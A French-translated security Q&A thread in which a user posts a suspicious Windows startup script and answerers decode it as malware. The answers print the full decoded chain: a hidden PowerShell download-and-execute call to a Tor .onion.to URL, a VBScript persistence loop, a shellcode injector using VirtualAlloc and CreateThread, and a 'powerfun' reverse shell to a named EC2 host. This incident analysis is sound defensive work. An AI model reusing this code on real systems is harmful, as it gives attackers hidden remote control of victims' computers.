web-dev-qa-db-fra.com

Code étrange en cours d'exécution au démarrage

Un morceau de code était en cours d'exécution sur ma machine Windows au démarrage. Je voudrais savoir exactement ce que fait ce code; il semble se référer à quelque chose comme le crackbook?

@echo off  
if %PROCESSOR_ARCHITECTURE%==x86 ( START /B powershell -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== ) 
if %PROCESSOR_ARCHITECTURE%==AMD64( START /B %WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== )

MODIFIER : J'ai essayé de formater mon PC. Il semble qu'un spyware de prpops.com (NSFW) soit installé sur mon système sans préavis.

Le fichier de configuration qui démarrait sur mon PC est toujours là même après avoir formaté mon PC. Voici un petit code à travers lequel il s'exécute.

Dim WinScriptHost 
WScript.Sleep(30000) 
Set WinScriptHost = CreateObject("WScript.Shell") 
WinScriptHost.Run Chr(34) & "%USERPROFILE%\appdata\file.bat" & Chr(34), 0 
While True 
set service = GetObject ("winmgmts:") 
running = 0 
for each Process in Service.InstancesOf ("Win32_Process") 
    If Process.Name = "powershell.exe" then 
        running = running + 1 
        End If 
next 
If running < 1 then 
    WinScriptHost.Run Chr(34) & "%USERPROFILE%\appdata\file.bat" & Chr(34), 0 
    End If 
WScript.Sleep(120000) 
Wend 
Set WinScriptHost = Nothing

Veuillez indiquer si cela télécharge automatiquement le script ou le stocke de quelque manière que ce soit en mémoire?

windowsobfuscationpowershell
72
Aditya Giri

Version courte

L'attaquant peut exécuter toutes les commandes PowerShell sur votre machine et peut être trouvé en obtenant le propriétaire de " ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com ".

Version longue

J'ai vidé le tableau binaire dans un fichier et l'ai téléchargé sur VirusTotal .

Le fichier nouvellement lancé me semble être une étape supplémentaire car il est vraiment petit (1,7 ko) et ne sera exécuté que pendant 10 secondes car il sera lié à PowerShell (puisque l'attaquant crée un thread au lieu de le lancer comme un processus séparé ) et la terminaison est retardée de 10 secondes lors de la dernière commande.

Mise à jour: je ne suis malheureusement pas en mesure de rétroconcevoir l'Assemblée, mais un rapide coup d'œil au fichier à l'aide d'un éditeur de texte a révélé la chaîne suivante:

powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(
'A really long base64 full code can be found below'));
IEX (New-Object IO.StreamReader(
New-Object IO.Compression.GzipStream($s,
[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();)

Cependant, cette étape utilise également GZIP en tant que couche d'obfuscation supplémentaire pour Base64, mais peut toujours être transférée vers:

# Powerfun - Written by Ben Turner & Dave Hardy

function Get-Webclient 
{
    $wc = New-Object -TypeName Net.WebClient
    $wc.UseDefaultCredentials = $true
    $wc.Proxy.Credentials = $wc.Credentials
    $wc
}
function powerfun 
{ 
    Param( 
    [String]$Command,
    [String]$Sslcon,
    [String]$Download
    ) 
    Process {
    $modules = @()  
    if ($Command -eq "bind")
    {
        $listener = [System.Net.Sockets.TcpListener]9999
        $listener.start()    
        $client = $listener.AcceptTcpClient()
    } 
    if ($Command -eq "reverse")
    {
    $client = New-Object  System.Net.Sockets.TCPClient("ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com",9999)
    }

    $stream = $client.GetStream()

    if ($Sslcon -eq "true") 
    {
        $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
        $sslStream.AuthenticateAsClient("ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com") 
        $stream = $sslStream 
    }

    [byte[]]$bytes = 0..20000|%{0}
    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
    $stream.Write($sendbytes,0,$sendbytes.Length)

    if ($Download -eq "true")
    {
        $sendbytes = ([text.encoding]::ASCII).GetBytes("[+] Loading modules.`n")
        $stream.Write($sendbytes,0,$sendbytes.Length)
        ForEach ($module in $modules)
        {
            (Get-Webclient).DownloadString($module)|Invoke-Expression
        }
    }

    $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
    $stream.Write($sendbytes,0,$sendbytes.Length)

    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
    {
        $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
        $data = $EncodedText.GetString($bytes,0, $i)
        $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )

        $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
        $x = ($error[0] | Out-String)
        $error.clear()
        $sendback2 = $sendback2 + $x

        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
        $stream.Write($sendbyte,0,$sendbyte.Length)
        $stream.Flush()  
    }
    $client.Close()
    $listener.Stop()
    }
}

powerfun -Command reverse -Sslcon true

Il s'agit d'une porte dérobée PowerShell assez simple qui se connecte à un serveur et permet ensuite à l'attaquant d'exécuter à distance des commandes PowerShell sur votre machine. Ce script "powerfun" peut être trouvé sur GitHub en recherchant deux secondes sur Google, donc je ne le lierai pas ici pour ne pas étirer les limites anti-spam. Cependant, en le comparant au script d'origine, vous remarquerez rapidement que l'attaquant a changé l'adresse du serveur distant en " ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com "et le port vers 9999, il devrait donc être facile de suivre l'attaquant si nécessaire.

Enfin: Le serveur écoute toujours ce port, donc l'attaquant peut contrôler votre ordinateur !

107
VincBreaker

Version courte

Votre machine est compromise et l'attaquant contrôle toujours votre ordinateur.

Version longue

En décodant l'expression encodée en base64 (la chaîne passée dans le -Enc argument), vous obtenez le code exécuté par PowerShell:

[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
iex (New-Object Net.WebClient).DownloadString("https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq")

Ce code télécharge essentiellement un peu plus de code PowerShell à partir d'un service caché Tor (via le onion.to passerelle, qui permet d'accéder aux services cachés de Tor à partir d'une machine non connectée à Tor) et l'exécute.

Voici le code qui est téléchargé et exécuté (encore une fois, exécution en ligne d'un script PowerShell encodé en base64):

powershell -Enc [long base64 encoded string]

Ce qui correspond au code suivant une fois décodé:

$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x = $o::VirtualAlloc(0, 0x1000, 0x3000, 0x40)
[Byte[]]$sc = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x70,0x6f,0x77,0x65,0x72,0x73,0x68,0x65,0x6c,0x6c,0x2e,0x65,0x78,0x65,0x20,0x2d,0x65,0x78,0x65,0x63,0x20,0x62,0x79,0x70,0x61,0x73,0x73,0x20,0x2d,0x6e,0x6f,0x70,0x20,0x2d,0x57,0x20,0x68,0x69,0x64,0x64,0x65,0x6e,0x20,0x2d,0x6e,0x6f,0x6e,0x69,0x6e,0x74,0x65,0x72,0x61,0x63,0x74,0x69,0x76,0x65,0x20,0x49,0x45,0x58,0x20,0x24,0x28,0x24,0x73,0x3d,0x4e,0x65,0x77,0x2d,0x4f,0x62,0x6a,0x65,0x63,0x74,0x20,0x49,0x4f,0x2e,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x53,0x74,0x72,0x65,0x61,0x6d,0x28,0x2c,0x5b,0x43,0x6f,0x6e,0x76,0x65,0x72,0x74,0x5d,0x3a,0x3a,0x46,0x72,0x6f,0x6d,0x42,0x61,0x73,0x65,0x36,0x34,0x53,0x74,0x72,0x69,0x6e,0x67,0x28,0x27,0x48,0x34,0x73,0x49,0x41,0x49,0x76,0x6d,0x79,0x56,0x67,0x43,0x41,0x36,0x56,0x57,0x62,0x57,0x2f,0x62,0x4e,0x68,0x44,0x2b,0x37,0x6c,0x39,0x78,0x63,0x4c,0x56,0x61,0x51,0x69,0x7a,0x43,0x4e,0x70,0x70,0x68,0x44,0x5a,0x42,0x69,0x72,0x70,0x4a,0x75,0x41,0x62,0x4c,0x57,0x71,0x4c,0x33,0x6c,0x67,0x32,0x45,0x67,0x74,0x48,0x53,0x4f,0x74,0x55,0x69,0x6b,0x53,0x31,0x4a,0x2b,0x57,0x65,0x4c,0x2f,0x58,0x6c,0x4b,0x69,0x58,0x68,0x77,0x6e,0x36,0x4c,0x4c,0x70,0x69,0x36,0x33,0x6a,0x33,0x63,0x50,0x6e,0x6e,0x6a,0x73,0x65,0x39,0x51,0x5a,0x47,0x66,0x49,0x4e,0x69,0x6b,0x54,0x48,0x77,0x34,0x55,0x62,0x45,0x53,0x69,0x47,0x44,0x2b,0x51,0x34,0x2b,0x36,0x70,0x39,0x4a,0x4a,0x68,0x67,0x4b,0x65,0x41,0x73,0x58,0x64,0x49,0x33,0x77,0x4f,0x78,0x58,0x52,0x72,0x74,0x58,0x53,0x6e,0x71,0x47,0x4b,0x4f,0x59,0x50,0x66,0x55,0x50,0x6b,0x33,0x4f,0x41,0x2b,0x54,0x47,0x4a,0x6d,0x43,0x31,0x6b,0x4d,0x4c,0x39,0x4f,0x4e,0x73,0x51,0x6a,0x69,0x48,0x7a,0x37,0x6a,0x78,0x76,0x38,0x7a,0x2f,0x78,0x6c,0x43,0x42,0x50,0x39,0x6d,0x74,0x38,0x44,0x4e,0x4e,0x55,0x52,0x73,0x56,0x30,0x66,0x35,0x42,0x37,0x6c,0x38,0x36,0x6b,0x7a,0x38,0x6c,0x58,0x75,0x43,0x43,0x5a,0x6f,0x6b,0x4b,0x42,0x45,0x5a,0x36,0x4a,0x61,0x61,0x4a,0x31,0x42,0x43,0x4f,0x45,0x68,0x6c,0x57,0x58,0x69,0x50,0x42,0x74,0x7a,0x76,0x79,0x78,0x45,0x50,0x62,0x47,0x35,0x62,0x53,0x74,0x37,0x57,0x76,0x4b,0x61,0x37,0x4b,0x31,0x46,0x6f,0x50,0x6b,0x4b,0x2b,0x50,0x71,0x4b,0x43,0x70,0x57,0x2f,0x79,0x66,0x6a,0x70,0x57,0x49,0x32,0x64,0x33,0x4d,0x43,0x58,0x69,0x61,0x55,0x68,0x5a,0x31,0x44,0x36,0x31,0x6a,0x6d,0x59,0x53,0x63,0x50,0x54,0x46,0x65,0x38,0x41,0x31,0x4c,0x4f,0x49,0x31,0x79,0x71,0x32,0x63,0x78,0x42,0x51,0x39,0x52,0x53,0x72,0x41,0x43,0x70,0x44,0x7a,0x4b,0x45,0x6a,0x51,0x45,0x66,0x33,0x55,0x39,0x4b,0x46,0x7a,0x69,0x42,0x62,0x6a,0x6c,0x4e,0x75,0x44,0x6a,0x4e,0x32,0x6a,0x50,0x59,0x78,0x61,0x31,0x76,0x58,0x79,0x78,0x69,0x4d,0x74,0x6a,0x6b,0x31,0x68,0x71,0x2b,0x62,0x58,0x6b,0x35,0x33,0x72,0x4c,0x6e,0x66,0x36,0x66,0x45,0x71,0x50,0x61,0x6d,0x49,0x66,0x33,0x71,0x43,0x53,0x5a,0x68,0x4b,0x74,0x72,0x36,0x7a,0x46,0x37,0x72,0x35,0x2f,0x6a,0x51,0x43,0x49,0x56,0x46,0x63,0x72,0x73,0x61,0x33,0x66,0x4f,0x56,0x32,0x32,0x4a,0x7a,0x68,0x74,0x2b,0x77,0x7a,0x44,0x45,0x6c,0x64,0x4b,0x41,0x52,0x54,0x6e,0x63,0x67,0x73,0x72,0x2b,0x4a,0x62,0x6f,0x43,0x31,0x79,0x67,0x6b,0x48,0x6a,0x4f,0x75,0x6f,0x42,0x73,0x6c,0x66,0x34,0x35,0x35,0x4d,0x4c,0x49,0x62,0x74,0x54,0x45,0x63,0x2b,0x4b,0x66,0x76,0x2f,0x50,0x37,0x50,0x37,0x2f,0x33,0x42,0x75,0x31,0x2f,0x38,0x66,0x75,0x2b,0x55,0x30,0x4a,0x55,0x76,0x65,0x61,0x61,0x57,0x53,0x4b,0x58,0x79,0x2b,0x79,0x54,0x6b,0x36,0x53,0x70,0x54,0x53,0x47,0x68,0x4b,0x2f,0x2b,0x47,0x4d,0x62,0x71,0x53,0x78,0x74,0x4c,0x73,0x6d,0x59,0x30,0x75,0x7a,0x56,0x55,0x67,0x74,0x6c,0x55,0x43,0x61,0x6d,0x72,0x77,0x4b,0x47,0x6b,0x53,0x33,0x35,0x44,0x69,0x33,0x36,0x58,0x7a,0x71,0x54,0x49,0x70,0x4b,0x46,0x6f,0x6d,0x59,0x72,0x6d,0x72,0x62,0x77,0x6a,0x58,0x53,0x6b,0x44,0x49,0x5a,0x6c,0x32,0x41,0x76,0x5a,0x49,0x4a,0x68,0x70,0x6b,0x2f,0x48,0x6a,0x6f,0x78,0x4c,0x56,0x39,0x66,0x75,0x33,0x33,0x55,0x57,0x75,0x76,0x32,0x77,0x36,0x7a,0x34,0x34,0x45,0x34,0x32,0x2b,0x42,0x35,0x39,0x4b,0x6d,0x42,0x37,0x45,0x66,0x4d,0x57,0x55,0x4b,0x77,0x78,0x51,0x71,0x48,0x67,0x52,0x68,0x31,0x54,0x68,0x58,0x7a,0x53,0x4a,0x49,0x32,0x70,0x36,0x4e,0x4b,0x42,0x4a,0x4d,0x71,0x66,0x68,0x2f,0x63,0x7a,0x7a,0x6e,0x71,0x46,0x44,0x68,0x6b,0x59,0x57,0x33,0x65,0x41,0x6d,0x61,0x43,0x6a,0x2f,0x72,0x34,0x5a,0x65,0x6f,0x79,0x6c,0x71,0x38,0x65,0x72,0x6b,0x6d,0x2b,0x70,0x4f,0x35,0x7a,0x75,0x46,0x30,0x39,0x6e,0x4d,0x4d,0x62,0x2b,0x6d,0x6e,0x58,0x75,0x45,0x44,0x48,0x72,0x36,0x65,0x66,0x7a,0x70,0x6f,0x62,0x65,0x33,0x42,0x55,0x41,0x57,0x6c,0x63,0x76,0x75,0x56,0x4f,0x46,0x57,0x45,0x57,0x51,0x68,0x6a,0x38,0x78,0x5a,0x4f,0x54,0x73,0x62,0x6a,0x6f,0x4f,0x72,0x4b,0x38,0x38,0x55,0x35,0x61,0x50,0x78,0x63,0x64,0x73,0x33,0x75,0x75,0x6e,0x35,0x52,0x68,0x59,0x54,0x5a,0x37,0x7a,0x45,0x4a,0x41,0x47,0x52,0x4d,0x61,0x61,0x39,0x51,0x55,0x75,0x57,0x53,0x64,0x33,0x34,0x62,0x54,0x67,0x42,0x42,0x39,0x6e,0x36,0x7a,0x4c,0x77,0x78,0x4d,0x7a,0x5a,0x4f,0x74,0x45,0x31,0x58,0x72,0x31,0x71,0x77,0x6d,0x56,0x57,0x4c,0x74,0x79,0x7a,0x67,0x71,0x35,0x32,0x49,0x37,0x35,0x59,0x4b,0x33,0x4d,0x43,0x44,0x51,0x61,0x39,0x2f,0x43,0x6e,0x2f,0x45,0x6f,0x65,0x43,0x53,0x4c,0x78,0x51,0x45,0x58,0x4b,0x79,0x34,0x79,0x4b,0x55,0x6d,0x4d,0x44,0x51,0x37,0x47,0x6b,0x38,0x4a,0x41,0x76,0x55,0x47,0x61,0x34,0x7a,0x49,0x4c,0x62,0x74,0x6c,0x74,0x71,0x2b,0x74,0x4a,0x73,0x53,0x4d,0x51,0x58,0x54,0x72,0x37,0x4c,0x71,0x39,0x62,0x76,0x31,0x43,0x72,0x70,0x48,0x64,0x71,0x57,0x57,0x7a,0x77,0x63,0x71,0x70,0x30,0x47,0x79,0x78,0x6f,0x77,0x35,0x37,0x6e,0x56,0x54,0x54,0x6b,0x78,0x6c,0x63,0x61,0x30,0x69,0x6a,0x6a,0x5a,0x30,0x6f,0x70,0x4f,0x4c,0x35,0x65,0x71,0x35,0x6c,0x31,0x43,0x63,0x75,0x4c,0x6d,0x6d,0x34,0x31,0x4a,0x77,0x4c,0x55,0x49,0x68,0x5a,0x4e,0x62,0x46,0x71,0x72,0x35,0x71,0x32,0x65,0x64,0x79,0x44,0x51,0x65,0x2b,0x52,0x4d,0x74,0x74,0x69,0x4a,0x70,0x5a,0x49,0x33,0x75,0x4d,0x56,0x57,0x2f,0x4e,0x37,0x39,0x43,0x2b,0x33,0x4b,0x36,0x32,0x74,0x31,0x48,0x70,0x58,0x4b,0x50,0x76,0x44,0x55,0x2f,0x73,0x71,0x4a,0x54,0x71,0x6a,0x4d,0x58,0x52,0x30,0x6e,0x58,0x4d,0x57,0x31,0x7a,0x7a,0x4d,0x4b,0x2b,0x6d,0x52,0x45,0x56,0x56,0x4c,0x62,0x65,0x31,0x38,0x36,0x50,0x7a,0x6e,0x30,0x6d,0x32,0x57,0x63,0x59,0x4b,0x75,0x36,0x38,0x54,0x35,0x47,0x53,0x6a,0x43,0x76,0x79,0x4b,0x4e,0x33,0x4b,0x4c,0x6a,0x75,0x39,0x44,0x72,0x67,0x6e,0x4d,0x51,0x35,0x34,0x48,0x50,0x45,0x48,0x70,0x48,0x74,0x62,0x30,0x30,0x39,0x44,0x47,0x61,0x36,0x46,0x52,0x65,0x75,0x76,0x7a,0x73,0x4a,0x44,0x45,0x75,0x4a,0x45,0x2f,0x78,0x30,0x71,0x5a,0x63,0x6f,0x2b,0x68,0x35,0x51,0x41,0x32,0x56,0x42,0x70,0x6f,0x64,0x61,0x4c,0x6e,0x4d,0x5a,0x54,0x72,0x67,0x78,0x4e,0x36,0x54,0x74,0x74,0x4c,0x6a,0x77,0x32,0x68,0x35,0x56,0x41,0x44,0x77,0x79,0x79,0x46,0x65,0x67,0x41,0x38,0x2b,0x76,0x4f,0x33,0x44,0x49,0x33,0x7a,0x4a,0x6c,0x46,0x2b,0x67,0x67,0x70,0x58,0x69,0x41,0x47,0x6f,0x41,0x75,0x53,0x41,0x6c,0x73,0x42,0x62,0x35,0x42,0x79,0x57,0x41,0x54,0x67,0x32,0x79,0x4e,0x55,0x51,0x63,0x46,0x49,0x4b,0x4c,0x61,0x57,0x39,0x32,0x73,0x46,0x6d,0x44,0x64,0x62,0x35,0x4f,0x77,0x67,0x53,0x70,0x63,0x4c,0x33,0x6e,0x47,0x4a,0x77,0x33,0x58,0x2f,0x54,0x42,0x33,0x37,0x61,0x4f,0x54,0x39,0x4b,0x2f,0x61,0x70,0x38,0x61,0x35,0x6f,0x64,0x48,0x70,0x39,0x6b,0x71,0x52,0x77,0x65,0x6e,0x6a,0x50,0x6d,0x55,0x5a,0x48,0x4a,0x5a,0x33,0x65,0x74,0x32,0x44,0x4e,0x72,0x62,0x4a,0x30,0x69,0x34,0x52,0x4a,0x74,0x50,0x66,0x64,0x4f,0x4f,0x46,0x56,0x2b,0x56,0x31,0x36,0x76,0x2b,0x4e,0x6d,0x6c,0x56,0x33,0x79,0x52,0x56,0x63,0x65,0x7a,0x6c,0x43,0x72,0x36,0x39,0x71,0x4d,0x77,0x41,0x2b,0x51,0x36,0x63,0x4f,0x36,0x39,0x6e,0x6c,0x77,0x6b,0x41,0x41,0x41,0x3d,0x3d,0x27,0x29,0x29,0x3b,0x49,0x45,0x58,0x20,0x28,0x4e,0x65,0x77,0x2d,0x4f,0x62,0x6a,0x65,0x63,0x74,0x20,0x49,0x4f,0x2e,0x53,0x74,0x72,0x65,0x61,0x6d,0x52,0x65,0x61,0x64,0x65,0x72,0x28,0x4e,0x65,0x77,0x2d,0x4f,0x62,0x6a,0x65,0x63,0x74,0x20,0x49,0x4f,0x2e,0x43,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x69,0x6f,0x6e,0x2e,0x47,0x7a,0x69,0x70,0x53,0x74,0x72,0x65,0x61,0x6d,0x28,0x24,0x73,0x2c,0x5b,0x49,0x4f,0x2e,0x43,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x69,0x6f,0x6e,0x2e,0x43,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x69,0x6f,0x6e,0x4d,0x6f,0x64,0x65,0x5d,0x3a,0x3a,0x44,0x65,0x63,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x29,0x29,0x29,0x2e,0x52,0x65,0x61,0x64,0x54,0x6f,0x45,0x6e,0x64,0x28,0x29,0x3b,0x29,0x00
for ($i=0; $i -le ($sc.Length-1); $i++) {
    $o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null
}
$z = $o::CreateThread(0, 0, $x, 0, 0, 0)
Start-Sleep -Second 100000

D'après ma compréhension, ce code importe des DLL système, puis exécute du code natif (le tableau d'octets longs sur la ligne 8).

Pour creuser davantage, on pourrait reconstruire le code natif à partir du tableau d'octets et le soumettre à VirusTotal pour essayer d'identifier de quel malware il s'agit, ou exécuter directement le script PowerShell dans un bac à sable pour analyser dynamiquement son comportement.

EDIT: Une analyse de cette dernière partie est disponible dans Réponse de VincBreaker .

43
mdeous

Il exécute un script Powershell avec du code Powershell encodé en Base64.

Voici le code Powershell décodé en cours d'exécution:

[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
iex (New-Object Net.WebClient).DownloadString("https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq")

Donc, ce script télécharge et appelle le contenu de https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq

Je vous laisse creuser davantage, car je ne veux pas naviguer vers un lien potentiellement malveillant. D'autant plus qu'il provient de * .onion.to, une adresse TOR.

10
SecretSasquatch